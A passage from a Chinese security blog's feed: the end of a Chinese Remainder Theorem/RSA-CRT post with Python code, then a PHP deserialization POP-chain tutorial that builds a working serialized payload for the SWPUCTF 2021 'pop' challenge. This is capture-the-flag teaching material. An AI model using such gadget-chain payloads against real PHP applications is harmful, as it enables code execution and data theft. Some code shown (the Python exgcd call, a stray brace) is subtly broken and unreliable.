class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist" style="height:0.3117em;"><span style="top:-2.55em;margin-left:0em;margin-right:0.05em;"><span class="pstrut" style="height:2.7em;"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mathnormal mtight">i</span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist" style="height:0.15em;"><span></span></span></span></span></span></span><span class="mord"><span class="mord mathnormal">c</span><span class="msupsub"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist" style="height:0.3117em;"><span style="top:-2.55em;margin-left:0em;margin-right:0.05em;"><span class="pstrut" style="height:2.7em;"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mathnormal mtight">i</span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist" style="height:0.15em;"><span></span></span></span></span></span></span><span class="mspace allowbreak"></span><span class="mspace" style="margin-right:1em;"></span><span class="mopen">(</span><span class="mord"><span class="mord"><span class="mord mathrm">mod</span></span></span><span class="mspace" style="margin-right:0.3333em;"></span><span class="mord mathnormal">n</span><span class="mclose">)</span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist" style="height:12.5838em;"><span></span></span></span></span></span></span></span></span></span></span></span></p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">def CRT(k, a, r):</span><br><span class="line">    n = 1</span><br><span class="line">    ans = 0</span><br><span class="line">    for i in range(1, k + 1):</span><br><span class="line">        n = n * r[i]          # 计算所有模数的乘积 n = r1×r2×...×rk</span><br><span class="line">    </span><br><span class="line">    for i in range(1, k + 1):</span><br><span class="line">        m = n // r[i]          # 除去当前模数的乘积 Mi = n/ri</span><br><span class="line">        b = y = 0</span><br><span class="line">        exgcd(m, r[i], b, y)   # 扩展欧几里得求 Mi 模 ri 的逆元 b</span><br><span class="line">        # 满足: b × m ≡ 1 (mod r[i])</span><br><span class="line">        </span><br><span class="line">        ans = (ans + a[i] * m * b % n) % n   # 累加: ans += ai × Mi × inv(Mi)</span><br><span class="line">    </span><br><span class="line">    return (ans % n + n) % n   # 确保结果为正</span><br></pre></td></tr></table></figure><h2 id="四-在rsa中的简单应用"><a class="markdownIt-Anchor" href="#四-在rsa中的简单应用"></a> 四、在RSA中的简单应用</h2><p class="katex-block"><span class="katex-display"><span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML" display="block"><semantics><mtable rowspacing="0.25em" columnalign="right left" columnspacing="0em"><mtr><mtd><mstyle scriptlevel="0" displaystyle="true"><mrow></mrow></mstyle></mtd><mtd><mstyle scriptlevel="0" displaystyle="true"><mrow><mrow></mrow><mrow><mtext mathvariant="bold">步骤</mtext><mtext> </mtext><mtext mathvariant="bold">1：计算模</mtext><mtext> </mtext></mrow><mi>p</mi><mtext> 下的明文分量</mtext></mrow></mstyle></mtd></mtr><mtr><mtd><mstyle scriptlevel="0" displaystyle="true"><mrow></mrow></mstyle></mtd><mtd><mstyle scriptlevel="0" displaystyle="true"><mrow><mrow></mrow><msub><mi>m</mi><mi>p</mi></msub><mo>=</mo><msup><mi>c</mi><msub><mi>d</mi><mi>p</mi></msub></msup><mspace></mspace><mspace width="1em"/><mo stretchy="false">(</mo><mrow><mi mathvariant="normal">m</mi><mi mathvariant="normal">o</mi><mi mathvariant="normal">d</mi></mrow><mspace width="0.3333em"/><mi>p</mi><mo stretchy="false">)</mo></mrow></mstyle></mtd></mtr><mtr><mtd><mstyle scriptlevel="0" displaystyle="true"><mrow></mrow></mstyle></mtd><mtd><mstyle scriptlevel="0" displaystyle="true"><mrow><mrow></mrow><mrow><mtext mathvariant="bold">步骤</mtext><mtext> </mtext><mtext mathvariant="bold">2：计算模</mtext><mtext> </mtext></mrow><mi>q</mi><mtext> 下的明文分量</mtext></mrow></mstyle></mtd></mtr><mtr><mtd><mstyle scriptlevel="0" displaystyle="true"><mrow></mrow></mstyle></mtd><mtd><mstyle scriptlevel="0" displaystyle="true"><mrow><mrow></mrow><msub><mi>m</mi><mi>q</mi></msub><mo>=</mo><msup><mi>c</mi><msub><mi>d</mi><mi>q</mi></msub></msup><mspace></mspace><mspace width="1em"/><mo stretchy="false">(</mo><mrow><mi mathvariant="normal">m</mi><mi mathvariant="normal">o</mi><mi mathvariant="normal">d</mi></mrow><mspace width="0.3333em"/><mi>q</mi><mo stretchy="false">)</mo></mrow></mstyle></mtd></mtr><mtr><mtd><mstyle scriptlevel="0" displaystyle="true"><mrow></mrow></mstyle></mtd><mtd><mstyle scriptlevel="0" displaystyle="true"><mrow><mrow></mrow><mrow><mtext mathvariant="bold">步骤</mtext><mtext> </mtext><mtext mathvariant="bold">3：计算</mtext><mtext> </mtext></mrow><mi>q</mi><mtext> 模 </mtext><mi>p</mi><mtext> 的逆元</mtext></mrow></mstyle></mtd></mtr><mtr><mtd><mstyle scriptlevel="0" displaystyle="true"><mrow></mrow></mstyle></mtd><mtd><mstyle scriptlevel="0" displaystyle="true"><mrow><mrow></mrow><mi>q</mi><mo>×</mo><msub><mi>q</mi><mtext>inv</mtext></msub><mo>≡</mo><mn>1</mn><mspace></mspace><mspace width="1em"/><mo stretchy="false">(</mo><mrow><mi mathvariant="normal">m</mi><mi mathvariant="normal">o</mi><mi mathvariant="normal">d</mi></mrow><mspace width="0.3333em"/><mi>p</mi><mo stretchy="false">)</mo></mrow></mstyle></mtd></mtr><mtr><mtd><mstyle scriptlevel="0" displaystyle="true"><mrow></mrow></mstyle></mtd><mtd><mstyle scriptlevel="0" displaystyle="true"><mrow><mrow></mrow><mrow><mtext mathvariant="bold">步骤</mtext><mtext> </mtext><mtext mathvariant="bold">4：计算组合参数</mtext><mtext> </mtext></mrow><mi>h</mi></mrow></mstyle></mtd></mtr><mtr><mtd><mstyle scriptlevel="0" displaystyle="true"><mrow></mrow></mstyle></mtd><mtd><mstyle scriptlevel="0" displaystyle="true"><mrow><mrow></mrow><mi>h</mi><mo>=</mo><mo stretchy="false">(</mo><msub><mi>q</mi><mtext>inv</mtext></msub><mo>×</mo><mo stretchy="false">(</mo><msub><mi>m</mi><mi>p</mi></msub><mo>−</mo><msub><mi>m</mi><mi>q</mi></msub><mo stretchy="false">)</mo><mo stretchy="false">)</mo><mtext> </mtext><mo lspace="0.22em" rspace="0.22em"><mrow><mi mathvariant="normal">m</mi><mi mathvariant="normal">o</mi><mi mathvariant="normal">d</mi></mrow></mo><mtext> </mtext><mi>p</mi></mrow></mstyle></mtd></mtr><mtr><mtd><mstyle scriptlevel="0" displaystyle="true"><mrow></mrow></mstyle></mtd><mtd><mstyle scriptlevel="0" displaystyle="true"><mrow><mrow></mrow><mrow><mtext mathvariant="bold">步骤</mtext><mtext> </mtext><mtext mathvariant="bold">5：计算最终明文</mtext><mtext> </mtext></mrow><mi>m</mi></mrow></mstyle></mtd></mtr><mtr><mtd><mstyle scriptlevel="0" displaystyle="true"><mrow></mrow></mstyle></mtd><mtd><mstyle scriptlevel="0" displaystyle="true"><mrow><mrow></mrow><mi>m</mi><mo>=</mo><msub><mi>m</mi><mi>q</mi></msub><mo>+</mo><mi>h</mi><mo>×</mo><mi>q</mi><mspace></mspace><mspace width="1em"/><mo stretchy="false">(</mo><mrow><mi mathvariant="normal">m</mi><mi mathvariant="normal">o</mi><mi mathvariant="normal">d</mi></mrow><mspace width="0.3333em"/><mi>n</mi><mo stretchy="false">)</mo></mrow></mstyle></mtd></mtr></mtable><annotation encoding="application/x-tex">\begin{aligned}&amp;\textbf{步骤 1：计算模 } p \text{ 下的明文分量} \\&amp;m_p = c^{d_p} \pmod{p} \\[2ex]&amp;\textbf{步骤 2：计算模 } q \text{ 下的明文分量} \\&amp;m_q = c^{d_q} \pmod{q} \\[2ex]&amp;\textbf{步骤 3：计算 } q \text{ 模 } p \text{ 的逆元} \\&amp;q \times q_{\text{inv}} \equiv 1 \pmod{p} \\[2ex]&amp;\textbf{步骤 4：计算组合参数 } h \\&amp;h = (q_{\text{inv}} \times (m_p - m_q)) \bmod p \\[2ex]&amp;\textbf{步骤 5：计算最终明文 } m \\&amp;m = m_q + h \times q \pmod{n}\end{aligned}</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:18.5662em;vertical-align:-9.0331em;"></span><span class="mord"><span class="mtable"><span class="col-align-r"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist" style="height:9.5331em;"><span style="top:-11.5922em;"><span class="pstrut" style="height:2.8991em;"></span><span class="mord"></span></span><span style="top:-10.0331em;"><span class="pstrut" style="height:2.8991em;"></span><span class="mord"></span></span><span style="top:-7.6711em;"><span class="pstrut" style="height:2.8991em;"></span><span class="mord"></span></span><span style="top:-6.112em;"><span class="pstrut" style="height:2.8991em;"></span><span class="mord"></span></span><span style="top:-3.75em;"><span class="pstrut" style="height:2.8991em;"></span><span class="mord"></span></span><span style="top:-2.25em;"><span class="pstrut" style="height:2.8991em;"></span><span class="mord"></span></span><span style="top:0.112em;"><span class="pstrut" style="height:2.8991em;"></span><span class="mord"></span></span><span style="top:1.612em;"><span class="pstrut" style="height:2.8991em;"></span><span class="mord"></span></span><span style="top:3.974em;"><span class="pstrut" style="height:2.8991em;"></span><span class="mord"></span></span><span style="top:5.474em;"><span class="pstrut" style="height:2.8991em;"></span><span class="mord"></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist" style="height:9.0331em;"><span></span></span></span></span></span><span class="col-align-l"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist" style="height:9.5331em;"><span style="top:-11.6931em;"><span class="pstrut" style="height:3em;"></span><span class="mord"><span class="mord"></span><span class="mord text"><span class="mord textbf cjk_fallback">步骤</span><span class="mord textbf"> 1</span><span class="mord textbf cjk_fallback">：计算模</span><span class="mord textbf"> </span></span><span class="mord mathnormal">p</span><span class="mord text"><span class="mord"> </span><span class="mord cjk_fallback">下的明文分量</span></span></span></span><span style="top:-10.134em;"><span class="pstrut" style="height:3em;"></span><span class="mord"><span class="mord"></span><span class="mord"><span class="mord mathnormal">m</span><span class="msupsub"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist" style="height:0.1514em;"><span style="top:-2.55em;margin-left:0em;margin-right:0.05em;"><span class="pstrut" style="height:2.7em;"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mathnormal mtight">p</span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist" style="height:0.2861em;"><span></span></span></span></span></span></span><span class="mspace" style="margin-right:0.2778em;"></span><span class="mrel">=</span><span class="mspace" style="margin-right:0.2778em;"></span><span class="mord"><span class="mord mathnormal">c</span><span class="msupsub"><span class="vlist-t"><span class="vlist-r"><span class="vlist" style="height:0.8991em;"><span style="top:-3.113em;margin-right:0.05em;"><span class="pstrut" style="height:2.7em;"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mtight"><span class="mord mtight"><span class="mord mathnormal mtight">d</span><span class="msupsub"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist" style="height:0.1645em;"><span style="top:-2.357em;margin-left:0em;margin-right:0.0714em;"><span class="pstrut" style="height:2.5em;"></span><span class="sizing reset-size3 size1 mtight"><span class="mord mathnormal mtight">p</span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist" style="height:0.2819em;"><span></span></span></span></span></span></span></span></span></span></span></span></span></span></span><span class="mspace allowbreak"></span><span class="mspace" style="margin-right:1em;"></span><span class="mopen">(</span><span class="mord"><span class="mord"><span class="mord mathrm">mod</span></span></span><span class="mspace" style="margin-right:0.3333em;"></span><span class="mord mathnormal">p</span><span class="mclose">)</span></span></span><span style="top:-7.772em;"><span class="pstrut" style="height:3em;"></span><span class="mord"><span class="mord"></span><span class="mord text"><span class="mord textbf cjk_fallback">步骤</span><span class="mord textbf"> 2</span><span class="mord textbf cjk_fallback">：计算模</span><span class="mord textbf"> </span></span><span class="mord mathnormal" style="margin-right:0.03588em;">q</span><span class="mord text"><span class="mord"> </span><span class="mord cjk_fallback">下的明文分量</span></span></span></span><span style="top:-6.2129em;"><span class="pstrut" style="height:3em;"></span><span class="mord"><span class="mord"></span><span class="mord"><span class="mord mathnormal">m</span><span class="msupsub"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist" style="height:0.1514em;"><span style="top:-2.55em;margin-left:0em;margin-right:0.05em;"><span class="pstrut" style="height:2.7em;"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mathnormal mtight" style="margin-right:0.03588em;">q</span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist" style="height:0.2861em;"><span></span></span></span></span></span></span><span class="mspace" style="margin-right:0.2778em;"></span><span class="mrel">=</span><span class="mspace" style="margin-right:0.2778em;"></span><span class="mord"><span class="mord mathnormal">c</span><span class="msupsub"><span class="vlist-t"><span class="vlist-r"><span class="vlist" style="height:0.8991em;"><span style="top:-3.113em;margin-right:0.05em;"><span class="pstrut" style="height:2.7em;"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mtight"><span class="mord mtight"><span class="mord mathnormal mtight">d</span><span class="msupsub"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist" style="height:0.1645em;"><span style="top:-2.357em;margin-left:0em;margin-right:0.0714em;"><span class="pstrut" style="height:2.5em;"></span><span class="sizing reset-size3 size1 mtight"><span class="mord mathnormal mtight" style="margin-right:0.03588em;">q</span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist" style="height:0.2819em;"><span></span></span></span></span></span></span></span></span></span></span></span></span></span></span><span class="mspace allowbreak"></span><span class="mspace" style="margin-right:1em;"></span><span class="mopen">(</span><span class="mord"><span class="mord"><span class="mord mathrm">mod</span></span></span><span class="mspace" style="margin-right:0.3333em;"></span><span class="mord mathnormal" style="margin-right:0.03588em;">q</span><span class="mclose">)</span></span></span><span style="top:-3.8509em;"><span class="pstrut" style="height:3em;"></span><span class="mord"><span class="mord"></span><span class="mord text"><span class="mord textbf cjk_fallback">步骤</span><span class="mord textbf"> 3</span><span class="mord textbf cjk_fallback">：计算</span><span class="mord textbf"> </span></span><span class="mord mathnormal" style="margin-right:0.03588em;">q</span><span class="mord text"><span class="mord"> </span><span class="mord cjk_fallback">模</span><span class="mord"> </span></span><span class="mord mathnormal">p</span><span class="mord text"><span class="mord"> </span><span class="mord cjk_fallback">的逆元</span></span></span></span><span style="top:-2.3509em;"><span class="pstrut" style="height:3em;"></span><span class="mord"><span class="mord"></span><span class="mord mathnormal" style="margin-right:0.03588em;">q</span><span class="mspace" style="margin-right:0.2222em;"></span><span class="mbin">×</span><span class="mspace" style="margin-right:0.2222em;"></span><span class="mord"><span class="mord mathnormal" style="margin-right:0.03588em;">q</span><span class="msupsub"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist" style="height:0.3175em;"><span style="top:-2.55em;margin-left:-0.0359em;margin-right:0.05em;"><span class="pstrut" style="height:2.7em;"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mtight"><span class="mord text mtight"><span class="mord mtight">inv</span></span></span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist" style="height:0.15em;"><span></span></span></span></span></span></span><span class="mspace" style="margin-right:0.2778em;"></span><span class="mrel">≡</span><span class="mspace" style="margin-right:0.2778em;"></span><span class="mord">1</span><span class="mspace allowbreak"></span><span class="mspace" style="margin-right:1em;"></span><span class="mopen">(</span><span class="mord"><span class="mord"><span class="mord mathrm">mod</span></span></span><span class="mspace" style="margin-right:0.3333em;"></span><span class="mord mathnormal">p</span><span class="mclose">)</span></span></span><span style="top:0.0111em;"><span class="pstrut" style="height:3em;"></span><span class="mord"><span class="mord"></span><span class="mord text"><span class="mord textbf cjk_fallback">步骤</span><span class="mord textbf"> 4</span><span class="mord textbf cjk_fallback">：计算组合参数</span><span class="mord textbf"> </span></span><span class="mord mathnormal">h</span></span></span><span style="top:1.5111em;"><span class="pstrut" style="height:3em;"></span><span class="mord"><span class="mord"></span><span class="mord mathnormal">h</span><span class="mspace" style="margin-right:0.2778em;"></span><span class="mrel">=</span><span class="mspace" style="margin-right:0.2778em;"></span><span class="mopen">(</span><span class="mord"><span class="mord mathnormal" style="margin-right:0.03588em;">q</span><span class="msupsub"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist" style="height:0.3175em;"><span style="top:-2.55em;margin-left:-0.0359em;margin-right:0.05em;"><span class="pstrut" style="height:2.7em;"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mtight"><span class="mord text mtight"><span class="mord mtight">inv</span></span></span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist" style="height:0.15em;"><span></span></span></span></span></span></span><span class="mspace" style="margin-right:0.2222em;"></span><span class="mbin">×</span><span class="mspace" style="margin-right:0.2222em;"></span><span class="mopen">(</span><span class="mord"><span class="mord mathnormal">m</span><span class="msupsub"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist" style="height:0.1514em;"><span style="top:-2.55em;margin-left:0em;margin-right:0.05em;"><span class="pstrut" style="height:2.7em;"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mathnormal mtight">p</span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist" style="height:0.2861em;"><span></span></span></span></span></span></span><span class="mspace" style="margin-right:0.2222em;"></span><span class="mbin">−</span><span class="mspace" style="margin-right:0.2222em;"></span><span class="mord"><span class="mord mathnormal">m</span><span class="msupsub"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist" style="height:0.1514em;"><span style="top:-2.55em;margin-left:0em;margin-right:0.05em;"><span class="pstrut" style="height:2.7em;"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mathnormal mtight" style="margin-right:0.03588em;">q</span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist" style="height:0.2861em;"><span></span></span></span></span></span></span><span class="mclose">))</span><span class="mspace" style="margin-right:0.0556em;"></span><span class="mspace" style="margin-right:0.2222em;"></span><span class="mbin"><span class="mord"><span class="mord mathrm">mod</span></span></span><span class="mspace" style="margin-right:0.0556em;"></span><span class="mspace" style="margin-right:0.2222em;"></span><span class="mord mathnormal">p</span></span></span><span style="top:3.8731em;"><span class="pstrut" style="height:3em;"></span><span class="mord"><span class="mord"></span><span class="mord text"><span class="mord textbf cjk_fallback">步骤</span><span class="mord textbf"> 5</span><span class="mord textbf cjk_fallback">：计算最终明文</span><span class="mord textbf"> </span></span><span class="mord mathnormal">m</span></span></span><span style="top:5.3731em;"><span class="pstrut" style="height:3em;"></span><span class="mord"><span class="mord"></span><span class="mord mathnormal">m</span><span class="mspace" style="margin-right:0.2778em;"></span><span class="mrel">=</span><span class="mspace" style="margin-right:0.2778em;"></span><span class="mord"><span class="mord mathnormal">m</span><span class="msupsub"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist" style="height:0.1514em;"><span style="top:-2.55em;margin-left:0em;margin-right:0.05em;"><span class="pstrut" style="height:2.7em;"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mathnormal mtight" style="margin-right:0.03588em;">q</span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist" style="height:0.2861em;"><span></span></span></span></span></span></span><span class="mspace" style="margin-right:0.2222em;"></span><span class="mbin">+</span><span class="mspace" style="margin-right:0.2222em;"></span><span class="mord mathnormal">h</span><span class="mspace" style="margin-right:0.2222em;"></span><span class="mbin">×</span><span class="mspace" style="margin-right:0.2222em;"></span><span class="mord mathnormal" style="margin-right:0.03588em;">q</span><span class="mspace allowbreak"></span><span class="mspace" style="margin-right:1em;"></span><span class="mopen">(</span><span class="mord"><span class="mord"><span class="mord mathrm">mod</span></span></span><span class="mspace" style="margin-right:0.3333em;"></span><span class="mord mathnormal">n</span><span class="mclose">)</span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist" style="height:9.0331em;"><span></span></span></span></span></span></span></span></span></span></span></span></p>]]>
    </content>
    <id>https://cl1ck-t0.github.io/2026/02/24/CRT/</id>
    <link href="https://cl1ck-t0.github.io/2026/02/24/CRT/"/>
    <published>2026-02-24T01:51:30.000Z</published>
    <summary>
      <![CDATA[<link rel="stylesheet" class="aplayer-secondary-style-marker" href="\assets\css\APlayer.min.css"><script src="\assets\js\APlayer.min.js" cla]]>
    </summary>
    <title>CRT</title>
    <updated>2026-03-04T14:08:30.233Z</updated>
  </entry>
  <entry>
    <author>
      <name>Cl1ck-t0</name>
    </author>
    <category term="web" scheme="https://cl1ck-t0.github.io/tags/web/"/>
    <category term="web漏洞" scheme="https://cl1ck-t0.github.io/tags/web%E6%BC%8F%E6%B4%9E/"/>
    <content>
      <![CDATA[<link rel="stylesheet" class="aplayer-secondary-style-marker" href="\assets\css\APlayer.min.css"><script src="\assets\js\APlayer.min.js" class="aplayer-secondary-script-marker"></script><h1 id="pop链构造"><a class="markdownIt-Anchor" href="#pop链构造"></a> pop链构造</h1><p>在PHP反序列化漏洞利用中，<strong>POP链（Property Oriented Programming Chain）</strong> 是通过魔术方法的自动触发机制，将多个类的方法串联起来，最终执行恶意代码的攻击链。核心思路是：<strong>找到入口 → 确定尾巴 → 构建中间桥梁</strong>。</p><p><strong>1. 明确入口与尾巴</strong></p><ul><li><strong>入口</strong>：常见为 <em>__wakeup()</em>、<em>__destruct()</em> 等在反序列化或对象销毁时自动调用的方法。</li><li><strong>尾巴</strong>：包含危险函数的代码位置，如 <em>eval()</em>、<em>system()</em>、<em>file_put_contents()</em>、<em>include()</em> 等。</li><li>先锁定尾巴，再反向寻找能触发它的调用链。</li></ul><p><strong>2. 利用魔术方法串联</strong> 常用魔术方法及触发条件：</p><ul><li><p><em>__get()</em>：访问不可访问属性时触发。</p></li><li><p><em>__set()</em>：给不可访问属性赋值时触发。</p></li><li><p><em>__call()</em>：调用不存在方法时触发。</p></li><li><p><em>__tostring()</em>：对象被当作字符串使用时触发。</p></li><li><p><em>__invoke()</em>：对象被当作函数调用时触发。</p><p>总之就是</p><p>1.寻找可利用的魔术方法作为起点，也就是说链头特征是能够被输入内容的并且能被用户所控制的；</p><ol start="2"><li>构建方法调用链，连接起点和终点；</li><li>找到危险函数或操作作为终点，也就是说链尾特征是可以读取文件或者能够执行命令的；</li><li>此时我们找到了链尾，正式开始构造pop链，从链尾反推到链头。</li></ol></li></ul><h3 id="egswpuctf-2021-新生赛pop"><a class="markdownIt-Anchor" href="#egswpuctf-2021-新生赛pop"></a> eg.[SWPUCTF 2021 新生赛]pop</h3><p>代码如下：</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line"></span><br><span class="line">error_reporting(0);</span><br><span class="line">show_source(&quot;index.php&quot;);</span><br><span class="line"></span><br><span class="line">class w44m&#123;</span><br><span class="line"></span><br><span class="line">    private $admin = &#x27;aaa&#x27;;</span><br><span class="line">    protected $passwd = &#x27;123456&#x27;;</span><br><span class="line">    </span><br><span class="line">    public function Getflag()&#123;</span><br><span class="line">        if($this-&gt;admin === &#x27;w44m&#x27; &amp;&amp; $this-&gt;passwd ===&#x27;08067&#x27;)&#123;</span><br><span class="line">            include(&#x27;flag.php&#x27;);</span><br><span class="line">            echo $flag;</span><br><span class="line">        &#125;else&#123;</span><br><span class="line">            echo $this-&gt;admin;</span><br><span class="line">            echo $this-&gt;passwd;</span><br><span class="line">            echo &#x27;nono&#x27;;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">class w22m&#123;</span><br><span class="line">    public $w00m;</span><br><span class="line">    public function __destruct()&#123;</span><br><span class="line">        echo $this-&gt;w00m;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">class w33m&#123;</span><br><span class="line">    public $w00m;</span><br><span class="line">    public $w22m;</span><br><span class="line">    public function __toString()&#123;</span><br><span class="line">        $this-&gt;w00m-&gt;&#123;$this-&gt;w22m&#125;();</span><br><span class="line">        return 0;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">$w00m = $_GET[&#x27;w00m&#x27;];</span><br><span class="line">unserialize($w00m);</span><br><span class="line"></span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure><p>我们来进行简单分析：</p><p>1.对于w44m类;</p><p>如果变量前是protected，则会在变量名前加上<code>\x00*\x00</code>,</p><p>若是private，则会在变量名前加上<code>\x00类名\x00</code>,输出时一般需要url编码;</p><p>最终目标是调用Getflag()；</p><p>2.对于w22m类；</p><p>当类销毁时会输出<code>$this-&gt;w00m</code>；</p><p>3.对于w33m类；</p><p>当w33m类的对象被当做字符串使用时，触发__toString()方法；</p><p>接着，我们尝试构造一下pop链，</p><ul><li>在w44m类中的Getflag作为尾部</li><li>w33m类中有<code>$this-&gt;w00m-&gt;{$this-&gt;w22m}();</code>，因此我们需要给w00m一个w44m类，给w22m一个Getflag字符串</li><li>而如何调用w33m类中的__toString()方法呢，我们看到w22m类中有<code>echo $this-&gt;w00m;</code>，需要给w00m一个w33m类即可</li></ul><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">w22m::__destruct()-&gt;w33m::__toString()-&gt;w44m::Getflag()</span><br></pre></td></tr></table></figure><p>接着，我们再尝试构造payload：</p><p>1、首先复制源码到编辑器中<br />将不需要的部分注释掉(和赋值无关的都注释掉)</p><p>以下是删除注释后的剩余部分：</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line"></span><br><span class="line">class w44m&#123;</span><br><span class="line"></span><br><span class="line">    private $admin = &#x27;aaa&#x27;;</span><br><span class="line">    protected $passwd = &#x27;123456&#x27;;</span><br><span class="line">    </span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">class w22m&#123;</span><br><span class="line">    public $w00m;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">class w33m&#123;</span><br><span class="line">    public $w00m;</span><br><span class="line">    public $w22m;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure><p>2、添加pop链和序列化代码<br />根据前面我们的分析，从pop链的链尾开始赋值<br />私有和保护属性，采用内部赋值；</p><p>对象赋值采用外部赋值：</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">$a=new w44m();// 创建w44m对象</span><br><span class="line">// 这里$a的属性还没有赋值，保持默认值</span><br><span class="line"></span><br><span class="line">$b=new w33m();</span><br><span class="line">$b-&gt;w00m=$a;//外部赋值：给public属性$w00m赋值</span><br><span class="line">$b-&gt;w22m=Getflag;//外部赋值：给public属性$w22m赋值</span><br><span class="line"></span><br><span class="line">$t=new w22m();</span><br><span class="line">$t-&gt;w00m=$b;</span><br><span class="line">echo serialize($t);</span><br><span class="line">echo &quot;\n&quot;;</span><br><span class="line">echo urlencode(serialize($t));</span><br></pre></td></tr></table></figure><p>构造得：</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">O:4:&quot;w22m&quot;:1:&#123;s:4:&quot;w00m&quot;;O:4:&quot;w33m&quot;:2:&#123;s:4:&quot;w00m&quot;;O:4:&quot;w44m&quot;:2:&#123;s:11:&quot;\00w44m\00admin&quot;;s:4:&quot;w44m&quot;;s:9:&quot;\00*\00passwd&quot;;s:5:&quot;08067&quot;;&#125;s:4:&quot;w22m&quot;;s:7:&quot;Getflag&quot;;&#125;&#125;</span><br></pre></td></tr></table></figure><p>URL编码：</p><figure class="highlight 